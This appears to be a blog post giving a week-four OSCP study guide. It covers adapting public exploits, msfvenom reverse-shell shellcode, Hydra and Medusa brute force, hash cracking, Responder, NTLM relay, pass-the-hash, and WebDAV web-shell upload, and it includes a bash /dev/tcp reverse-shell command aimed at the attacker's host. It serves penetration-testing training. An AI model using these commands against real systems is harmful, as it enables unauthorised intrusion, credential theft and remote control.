Locating & Fixing Exploits, Password Attacks

WEEK 4 Locating & Fixing Exploits, Password Attacks

Posted Mar 4, 2026

By Muhammed Omar Makhlouf

18 min read

Locating & Fixing Exploits, Password Attacks

Week 4: Locating & Fixing Exploits, Password Attacks

OSCP / PEN-200 Study Plan — Complete Detail Guide

Overview

Week 4 develops two foundational penetration testing skills: finding and adapting public exploits from open sources, and executing password attacks across multiple authentication mechanisms. Rather than relying on automated frameworks, this week emphasizes understanding exploit code at a level where you can read, modify, and compile it yourself — a skill directly tested in the OSCP exam. Password attacks round out the week with brute-force tooling, hash cracking, and protocol-specific techniques including NTLM relay and WebDAV exploitation.

Core Theme: Real-world engagements rarely hand you a working exploit. You find a broken one, fix it, and make it work against a target that doesn’t match the original PoC environment. That gap between “found” and “working” is this week’s focus.

Learning Objectives

By the end of Week 4, you should be able to:

Search Exploit-DB and SearchSploit for vulnerability-specific public exploits
Read and understand exploit source code in C, Python, and Ruby
Cross-compile exploit code for 32-bit and 64-bit target architectures
Modify buffer sizes, offsets, shellcode, and connection parameters in exploit PoCs
Perform brute-force and dictionary attacks against SSH, RDP, and HTTP login forms
Crack common hash types using Hashcat and John the Ripper
Understand and abuse NTLM authentication and Net-NTLMv2 relay attacks
Use WebDAV as a file delivery and code execution mechanism

Part 1: Locating Public Exploits

Exploit-DB

Exploit-DB is the primary public repository for proof-of-concept exploit code, maintained by OffSec. Every entry maps to a CVE or specific software vulnerability.

How to search effectively:

https://www.exploit-db.com/

Search fields:
- Software name: "Apache", "vsftpd", "OpenSSH"
- CVE number: CVE-2021-41773
- Platform: Windows, Linux, multi
- Type: Remote, Local, WebApps, DoS, Shellcode
- Verified checkbox: prioritise verified exploits first

What to look for when evaluating an exploit:

Field	What to Check
Platform	Does it match your target OS?
Date	Older exploits may need patching for modern Python/C
Verified	OffSec-verified exploits are more reliable
Author notes	Hints about required conditions
CVE	Cross-reference NVD for affected version range
Code language	Python 2 vs 3, C compiler requirements

SearchSploit

SearchSploit is the offline command-line interface to Exploit-DB, bundled with Kali Linux. It allows you to search without internet access — critical in isolated lab environments.

  
# Update the local database
searchsploit -u

# Search by software name
searchsploit vsftpd
searchsploit apache 2.4
searchsploit "windows smb"

# Search by CVE
searchsploit CVE-2021-41773

# Show full file paths
searchsploit -p 49757

# Copy exploit to current directory
searchsploit -m 49757
searchsploit -m exploits/linux/remote/49757.py

# Examine an exploit without copying
searchsploit -x 49757

# Filter by platform
searchsploit --nmap scan_results.xml     # auto-match from Nmap output

Workflow — Nmap to SearchSploit:

  
# Save Nmap output in XML format
nmap -sV -oX scan.xml <target_ip>

# Feed directly into SearchSploit to auto-match exploits
searchsploit --nmap scan.xml

Metasploit (Orientation Level)

A deeper Metasploit dive comes later, but Week 4 introduces it as a framework for understanding module structure.

  
# Launch console
msfconsole

# Search for exploits
search type:exploit name:vsftpd
search cve:2021-41773
search platform:windows smb

# Use a module
use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
show options

# Set target
set RHOSTS <target_ip>
set RPORT 21

# Run
run
exploit

# Search for auxiliary (scanning/brute force) modules
search type:auxiliary name:ssh_login

Nmap NSE Scripts for Exploit Detection

  
# Run all vulnerability scripts
nmap --script vuln -sV -p- <target_ip>

# Target specific service vulnerabilities
nmap --script smb-vuln* -p 445 <target_ip>
nmap --script ftp-vuln* -p 21 <target_ip>
nmap --script http-vuln* -p 80,443,8080 <target_ip>

# Check for specific CVEs
nmap --script smb-vuln-ms17-010 -p 445 <target_ip>    # EternalBlue
nmap --script smb-vuln-ms08-067 -p 445 <target_ip>    # MS08-067

# Combine with version detection for full picture
nmap -sV --script vuln -oN vuln_scan.txt <target_ip>

Part 2: Fixing Exploits

This is the skill that separates capable penetration testers from tool runners. Public PoC exploits are almost never “drop and run” — they require adaptation.

Common Reasons an Exploit Fails

Reason	Symptom	Fix
Wrong architecture	Segfault, immediate crash	Recompile for correct arch
Wrong Python version	Syntax errors, import errors	Port to Python 3 or use python2 explicitly
Hardcoded offset	Exploit runs but no shell	Adjust buffer size / offset
Wrong shellcode	Connection established, no shell	Regenerate shellcode with msfvenom
Bad characters in shellcode	Shellcode truncated	Identify and remove bad chars
Deprecated library	ImportError	Replace with modern equivalent
Missing dependency	ModuleNotFoundError	pip install or apt install

Reading Exploit Code

Before modifying anything, read the exploit completely.

What to identify in a C exploit:

  
// Look for these elements

// 1. Target IP/port — often hardcoded
char *host = "192.168.1.1";   // Change to your target
int port = 8080;

// 2. Buffer sizes and offsets — critical for buffer overflows
char buffer[512];              // Adjust if needed
int offset = 76;               // EIP offset — may differ on your target

// 3. Shellcode block — replace with your payload
unsigned char shellcode[] =
"\xdb\xc0\xb8..."              // Replace with msfvenom output

// 4. Bad characters — nulls (\x00) break string-based exploits
// 5. Return address / jump address — may differ by OS/patch level

What to identify in a Python exploit:

  
# 1. Python version — print statement vs print() function
print "Hello"       # Python 2 — run with python2 or convert
print("Hello")      # Python 3

# 2. Import changes between versions
import urllib2      # Python 2
import urllib.request  # Python 3 equivalent

# 3. String vs bytes handling
s.send("GET / HTTP/1.0\r\n\r\n")      # Python 2 string
s.send(b"GET / HTTP/1.0\r\n\r\n")     # Python 3 bytes

# 4. Hardcoded connection details
rhost = "192.168.1.1"    # Change to target
rport = 80               # Change if needed
lhost = "192.168.1.100"  # Change to your Kali IP
lport = 4444             # Change to your listener port

Cross-Compiling for Different Architectures

When the exploit is in C and your attack machine (64-bit Kali) differs from the target (32-bit Linux or Windows):

Linux targets:

  
# Install cross-compilation tools
sudo apt install gcc-multilib mingw-w64

# Compile for 32-bit Linux target (on 64-bit Kali)
gcc -m32 -o exploit exploit.c

# Compile for 64-bit Linux
gcc -o exploit exploit.c

# Compile for 32-bit Windows target (cross-compile from Linux)
i686-w64-mingw32-gcc exploit.c -o exploit.exe

# Compile for 64-bit Windows target
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

# Compile with specific libraries
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32

# Static linking (avoids DLL dependency issues)
x86_64-w64-mingw32-gcc -static exploit.c -o exploit.exe -lws2_32

Troubleshooting compilation:

  
# Check what architecture your binary is
file exploit.exe
file exploit

# Verify linked libraries
ldd exploit

# Strip debug symbols (reduces size)
strip exploit.exe

Regenerating Shellcode with msfvenom

When an exploit has embedded shellcode, always replace it with your own — the original may be stale, detected, or pointing to the wrong IP.

  
# Linux x86 reverse shell shellcode
msfvenom -p linux/x86/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f c -b "\x00"

# Linux x64 reverse shell shellcode
msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f c -b "\x00"

# Windows x86 reverse shell shellcode
msfvenom -p windows/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f c -b "\x00\x0a\x0d"

# Windows x64 reverse shell shellcode
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f c -b "\x00"

# Python format (for Python exploits)
msfvenom -p linux/x86/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f python -b "\x00"

# Raw format (paste manually)
msfvenom -p windows/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f raw -b "\x00" | xxd

Replacing shellcode in a C exploit:

  
// Original (stale/wrong IP)
unsigned char shellcode[] = "\xdb\xc0\xb8\x12\x34\x56\x78...";

// Replace with msfvenom output — paste between the quotes
unsigned char shellcode[] =
"\xbb\x7f\x00\x00\x01\xda\xc8\xd9\x74..."   // your new payload

Adjusting Buffer Overflow Parameters

For simple stack-based buffer overflow exploits found on Exploit-DB:

  
# Step 1: Confirm the offset in the exploit matches your target
# The exploit may say: offset = 524

# Step 2: Verify with pattern tools if it does not work
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_value>

# Step 3: Confirm bad characters match the service
# Common bad chars: \x00 (null), \x0a (newline), \x0d (carriage return), \xff

# Step 4: Verify the return address / JMP ESP address matches the target binary
# Use mona.py in Immunity Debugger on Windows targets:
# !mona jmp -r esp -cpb "\x00\x0a\x0d"

Part 3: Password Attacks

Wordlists

Before running any attack, choose an appropriate wordlist.

  
# Primary wordlist — rockyou.txt
/usr/share/wordlists/rockyou.txt

# Decompress if needed
gunzip /usr/share/wordlists/rockyou.txt.gz

# SecLists — comprehensive collection
sudo apt install seclists
ls /usr/share/seclists/Passwords/

# Common web login wordlists
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt

# Username lists
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/Names/names.txt

Hydra — Brute-Force and Dictionary Attacks

Hydra supports most authentication protocols and is the go-to tool for online brute force.

SSH:

  
# Single username, wordlist
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target_ip>

# Username list + password list
hydra -L users.txt -P passwords.txt ssh://<target_ip>

# Specify port
hydra -l root -P rockyou.txt -s 2222 ssh://<target_ip>

# Throttle to avoid lockout
hydra -l admin -P rockyou.txt -t 4 -W 3 ssh://<target_ip>

RDP:

  
hydra -l administrator -P rockyou.txt rdp://<target_ip>
hydra -L users.txt -P passwords.txt rdp://<target_ip> -t 4

HTTP POST login form:

  
# Syntax: http-post-form "path:body_params:failure_string"
hydra -l admin -P rockyou.txt \
  <target_ip> http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

# With session cookie
hydra -l admin -P rockyou.txt \
  <target_ip> http-post-form \
  "/login:username=^USER^&password=^PASS^:F=Login failed:H=Cookie: PHPSESSID=abc123"

HTTP Basic Auth:

hydra -l admin -P rockyou.txt http-get://<target_ip>/protected/

FTP:

hydra -l ftp -P rockyou.txt ftp://<target_ip>

SMB:

hydra -l administrator -P rockyou.txt smb://<target_ip>

Medusa

Alternative to Hydra — useful when Hydra fails or the service requires different handling.

  
# SSH
medusa -h <target_ip> -u admin -P rockyou.txt -M ssh

# RDP
medusa -h <target_ip> -u administrator -P rockyou.txt -M rdp

# HTTP form
medusa -h <target_ip> -u admin -P rockyou.txt -M http \
  -m DIR:/login -m FORM:username=^USER^&password=^PASS^ \
  -m DENY-SIGNAL:"Invalid"

# FTP
medusa -h <target_ip> -u ftp -P rockyou.txt -M ftp

# Specify threads
medusa -h <target_ip> -u admin -P rockyou.txt -M ssh -t 4

Hash Cracking with Hashcat

Identifying hash types:

  
# Use hashid or hash-identifier
hashid '$1$abc$xxxxxxxxxxxxxxxxxxxxxxxxxxx'
hash-identifier

# Or identify by format:
# MD5:    32 hex chars           5f4dcc3b5aa765d61d8327deb882cf99
# SHA1:   40 hex chars
# SHA256: 64 hex chars
# NTLM:   32 hex chars (no $)   aad3b435b51404eeaad3b435b51404ee
# NTLMv2: username::domain:challenge:response format
# bcrypt: $2a$ or $2b$ prefix
# SHA512crypt: $6$ prefix

Common Hashcat modes:

Mode	Hash Type	Example
0	MD5	5f4dcc3b5aa765d61d8327deb882cf99
100	SHA1	da39a3ee5e6b4b0d3255bfef95601890
1000	NTLM	aad3b435b51404eeaad3b435b51404ee
1800	sha512crypt ($6$)	$6$rounds=5000$…
3200	bcrypt ($2*$)	$2a$10$…
5600	Net-NTLMv2	user::domain:challenge:response
500	md5crypt ($1$)	$1$salt$hash
1500	DES (descrypt)	aaDIsj2gs9r8A

  
# Straight dictionary attack
hashcat -m 1000 ntlm_hash.txt /usr/share/wordlists/rockyou.txt

# With rules (expands wordlist variations)
hashcat -m 1000 ntlm_hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Combination attack (combine two wordlists)
hashcat -m 0 md5_hash.txt wordlist1.txt wordlist2.txt -a 1

# Brute force mask attack (8-character alphanumeric)
hashcat -m 1000 ntlm_hash.txt -a 3 ?a?a?a?a?a?a?a?a

# Mask attack — common password patterns
hashcat -m 1000 hash.txt -a 3 ?u?l?l?l?d?d?d?d    # Passw0rd style

# Resume a session
hashcat --restore

# Show cracked passwords
hashcat -m 1000 ntlm_hash.txt --show

# Save results
hashcat -m 1000 hash.txt rockyou.txt -o cracked.txt

Hashcat mask characters:

Mask	Character Set
`?l`	Lowercase letters a-z
`?u`	Uppercase letters A-Z
`?d`	Digits 0-9
`?s`	Special characters
`?a`	All printable characters

John the Ripper

John is often faster for certain Unix hash types and has built-in format detection.

  
# Auto-detect format and crack
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Specify format explicitly
john hash.txt --format=NT --wordlist=rockyou.txt
john hash.txt --format=sha512crypt --wordlist=rockyou.txt
john hash.txt --format=bcrypt --wordlist=rockyou.txt

# Crack /etc/shadow directly
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=rockyou.txt

# Show cracked passwords
john hash.txt --show

# Use rules
john hash.txt --wordlist=rockyou.txt --rules=best64

# Crack SSH private key passphrase
ssh2john id_rsa > id_rsa_hash.txt
john id_rsa_hash.txt --wordlist=rockyou.txt

# Crack ZIP password
zip2john protected.zip > zip_hash.txt
john zip_hash.txt --wordlist=rockyou.txt

NTLM and Net-NTLMv2 Attacks

Capturing hashes with Responder:

  
# Start Responder on your network interface
sudo responder -I eth0

# With verbose output
sudo responder -I eth0 -v

# Responder poisons:
# - LLMNR (UDP 5355)
# - NBT-NS (UDP 137)
# - mDNS (UDP 5353)
# When a Windows machine can't resolve a hostname, it broadcasts —
# Responder answers and captures the NTLMv2 authentication attempt

# Hashes saved to:
/usr/share/responder/logs/

Cracking captured Net-NTLMv2:

  
# Format: username::domain:challenge:NTresponse
hashcat -m 5600 ntlmv2_hash.txt /usr/share/wordlists/rockyou.txt
john ntlmv2_hash.txt --format=netntlmv2 --wordlist=rockyou.txt

NTLM Relay with ntlmrelayx:

  
# Relay hashes to a target instead of cracking them
# Requires SMB signing disabled on target

# Step 1: Disable SMB/HTTP response in Responder config
# Edit /etc/responder/Responder.conf:
# SMB = Off
# HTTP = Off

# Step 2: Start Responder (capture mode only)
sudo responder -I eth0

# Step 3: Run ntlmrelayx to relay to a target
sudo ntlmrelayx.py -t smb://<target_ip> -smb2support

# If successful — dumps SAM database of target
# Or attempt command execution
sudo ntlmrelayx.py -t smb://<target_ip> -smb2support -c "whoami"

# Relay to multiple targets from a file
sudo ntlmrelayx.py -tf targets.txt -smb2support

Pass-the-Hash:

  
# If you have an NTLM hash but not the plaintext password,
# authenticate directly using the hash

# Using crackmapexec
crackmapexec smb <target_ip> -u administrator -H <ntlm_hash>

# Using psexec
impacket-psexec administrator@<target_ip> -hashes :<ntlm_hash>

# Using smbclient
smbclient \\\\<target_ip>\\C$ -U administrator --pw-nt-hash <ntlm_hash>

WebDAV — File Upload and Code Execution

WebDAV (Web Distributed Authoring and Versioning) extends HTTP to allow file management on web servers. Misconfigured WebDAV installations allow uploading and executing files.

Detecting WebDAV:

  
# Nmap WebDAV detection
nmap --script http-webdav-scan -p 80,443 <target_ip>

# davtest — test what file types can be uploaded and executed
davtest -url http://<target_ip>/webdav/

# Check with curl
curl -X OPTIONS http://<target_ip>/ -v
# Look for: Allow: OPTIONS, GET, HEAD, POST, PUT, DELETE, ...
# PUT method allowed = potential upload vector

Uploading files with cadaver:

  
# Connect to WebDAV share
cadaver http://<target_ip>/webdav/

# Inside cadaver shell:
dav:/webdav/> put shell.php
dav:/webdav/> ls
dav:/webdav/> quit

Uploading with curl:

  
# Upload a file via PUT
curl -T shell.php http://<target_ip>/webdav/shell.php

# Upload with authentication
curl -T shell.php http://<target_ip>/webdav/shell.php \
  -u username:password

# Verify upload
curl http://<target_ip>/webdav/

WebDAV attack workflow:

  
# Step 1: Detect WebDAV
nmap --script http-webdav-scan -p 80 <target_ip>

# Step 2: Test what extensions can be uploaded
davtest -url http://<target_ip>/webdav/

# Step 3: Upload web shell (if .php is executable)
curl -T shell.php http://<target_ip>/webdav/shell.php

# Step 4: Execute and catch reverse shell
curl "http://<target_ip>/webdav/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/<your_ip>/4444+0>%261'"
nc -lvnp 4444

# Step 5: If .php blocked, try .asp, .aspx, .cfm, .pl
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f aspx -o shell.aspx
curl -T shell.aspx http://<target_ip>/webdav/shell.aspx

Practice Resources

OffSec PEN-200 Labs (Required)

Module	Focus Area
Locating Public Exploits	Exploit-DB, SearchSploit, Metasploit search
Fixing Exploits	Cross-compilation, shellcode replacement, Python porting
Password Attacks — SSH	Hydra/Medusa dictionary attacks
Password Attacks — RDP	Brute force with rate limiting awareness
Password Attacks — HTTP POST	Form-based brute force with Hydra
Hash Cracking	Hashcat modes, rules, and wordlists

Proving Ground Practice Labs

Machine	Difficulty	Primary Technique
`Kevin`	Easy	Service brute force, exploit modification
`shifty`	Easy	Password attacks, credential reuse
`Twiggy`	Easy	Public exploit + adaptation
`Authby`	Medium	Authentication bypass, WebDAV
`nickel`	Medium	Exploit research + fixing + hash cracking
`Phobos`	Medium	Chained password attacks + exploit

For each lab: run SearchSploit against identified service versions before reaching for Metasploit.

Hack The Box Machines

Machine	Focus	Notes
Machines requiring exploit modification	Exploit fixing workflow	Search for CVE, download PoC, adapt
Machines requiring password cracking	Hash cracking + brute force	Focus on identifying hash type correctly

Additional References

Resource	Purpose
exploit-db.com	Primary exploit repository
nvd.nist.gov	CVE details and affected versions
hashcat.net/wiki	Complete hash mode reference
github.com/danielmiessler/SecLists	Wordlists for all attack types
github.com/swisskyrepo/PayloadsAllTheThings	Password attack reference
hashes.com	Online hash lookup (pre-computed)

Suggested Daily Schedule (7-Day Breakdown)

Day	Focus	Hours
Day 1	Exploit-DB + SearchSploit workflow, Nmap NSE vuln scripts	3-4 hrs
Day 2	Reading and modifying Python and C exploit code	4-5 hrs
Day 3	Cross-compilation, msfvenom shellcode replacement	3-4 hrs
Day 4	Hydra + Medusa — SSH, RDP, HTTP POST brute force	4-5 hrs
Day 5	Hashcat + John — hash cracking, rules, NTLM/NTLMv2	4-5 hrs
Day 6	NTLM relay + WebDAV exploitation + Proving Ground labs	5-6 hrs
Day 7	Labs: `Authby`, `nickel`, `Phobos` + review and notes	4-5 hrs

Week 4 Checklist

Locating Exploits

Used SearchSploit to find an exploit for a specific CVE
Fed Nmap XML output into SearchSploit for auto-matching
Evaluated a PoC exploit for architecture and language compatibility
Located a Metasploit module and reviewed its options

Fixing Exploits

Ported a Python 2 exploit to Python 3
Cross-compiled a C exploit for a Windows 32-bit target
Replaced embedded shellcode with msfvenom-generated payload
Successfully ran a modified exploit against a lab target

Password Attacks

Ran Hydra against SSH with a wordlist
Ran Hydra against an HTTP POST login form
Ran Hydra or Medusa against RDP
Cracked an NTLM hash with Hashcat (-m 1000)
Cracked a Net-NTLMv2 hash with Hashcat (-m 5600)
Cracked a Unix hash (/etc/shadow) with John
Used Responder to capture an NTLMv2 hash
Attempted ntlmrelayx relay to a lab target
Used Pass-the-Hash with crackmapexec or impacket

WebDAV

Detected WebDAV with davtest or Nmap
Uploaded a web shell via PUT (curl or cadaver)
Executed commands through the uploaded shell
Caught a reverse shell from a WebDAV-delivered payload

Labs

Completed Kevin (Proving Ground)
Completed Authby (Proving Ground)
Completed nickel or Phobos (Proving Ground)

Key Takeaways

Public exploits are starting points, not solutions — always read the code before running it.
Identifying Python version mismatches takes 30 seconds; not identifying them wastes hours.
Always generate your own shellcode — original PoC shellcode points to someone else’s IP.
rockyou.txt with the best64 rule catches the majority of weak passwords in CTF environments.
NTLM relay is often faster than cracking — if SMB signing is off, relay before you crack.
WebDAV with PUT enabled is effectively an unauthenticated file upload vulnerability.
Correct hash identification is mandatory — hashcat on the wrong mode produces nothing.

_Plan prepared for OSCP / PEN-200 Week 4

Exploit Research and Adaptation → Password Attacks → NTLM and WebDAV_

You can find me online at:

GitHub: Mhdomer
LinkedIn: mhd3omar
Tryhackme: nonlouy

OSCP_Cert

This post is licensed under CC BY 4.0 by the author.